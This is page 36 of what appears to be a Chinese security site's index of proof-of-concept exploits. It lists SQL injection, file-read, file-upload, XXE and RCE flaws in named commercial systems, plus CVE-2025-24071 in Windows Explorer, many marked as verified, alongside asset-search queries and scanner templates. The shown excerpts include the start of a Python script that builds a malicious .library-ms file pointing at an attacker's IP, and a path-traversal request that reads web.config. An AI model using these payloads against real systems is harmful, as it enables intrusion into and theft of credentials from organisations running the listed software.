POC 第36页
【通用】杭州平治科技一卡通系统 AddPkFreePartyMFCar 存在SQL注入漏洞_秃兔安全

【通用】杭州平治科技一卡通系统 AddPkFreePartyMFCar 存在SQL注入漏洞

fofa语句yakit插件 uuidpocyakit && nuceli poc已验证   
【通用】 CVE-2025-24071 Windows 资源管理器重大漏洞poc_秃兔安全

【通用】 CVE-2025-24071 Windows 资源管理器重大漏洞poc

github链接:pocpy脚本import os import zipfile def main(): ''' 该程序生成一个恶意 .library-ms 文件,并将其打包为 ZIP 归档。 用户需要输入文件名称和攻击者的 IP 地址。 ''' file_name = ...
dreamer292的头像_秃兔安全至尊玉兔dreamer29211个月前
012415
【通用】在线录音管理系统 index.php 任意文件读取_秃兔安全

【通用】在线录音管理系统 index.php 任意文件读取

fofa语句yakit插件 uuidpocyaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer29210个月前
09013
【通用】美特CRM upload3.jsp  任意文件上传_秃兔安全

【通用】美特CRM upload3.jsp 任意文件上传

fofa语句pocyaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer2929个月前
01035
【通用】满客宝后台管理系统 downLoadStockInFile  任意文件读取_秃兔安全
【2025特殊通用】【通用】扁鹊飞救智能急救与质控系统 CreateJKDA XXE_秃兔安全
【2025特殊通用】爱数AnyShare start_service rce_秃兔安全

【2025特殊通用】爱数AnyShare start_service rce

fofa语句pocyaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer2927个月前
010914
【通用】泛微E-cology9 ImportValidation sqli_秃兔安全

【通用】泛微E-cology9 ImportValidation sqli

fofa语句yakit插件 uuidpocyaml懒得验证  
dreamer292的头像_秃兔安全至尊玉兔dreamer2926个月前
06211
【通用】顺景ERP TMScmQuoteGetFile 任意文件读取_秃兔安全

【通用】顺景ERP TMScmQuoteGetFile 任意文件读取

fofa语句yakit插件 uuidpoc yakit yamlnuclei yaml已验证   
天问物业 ERP 系统 AreaAvatarDownLoad.aspx 任意文件读取漏洞_秃兔安全

天问物业 ERP 系统 AreaAvatarDownLoad.aspx 任意文件读取漏洞

GET /HM/ Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1Host: xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firef...
秃兔的头像_秃兔安全至尊玉兔秃兔2年前
01076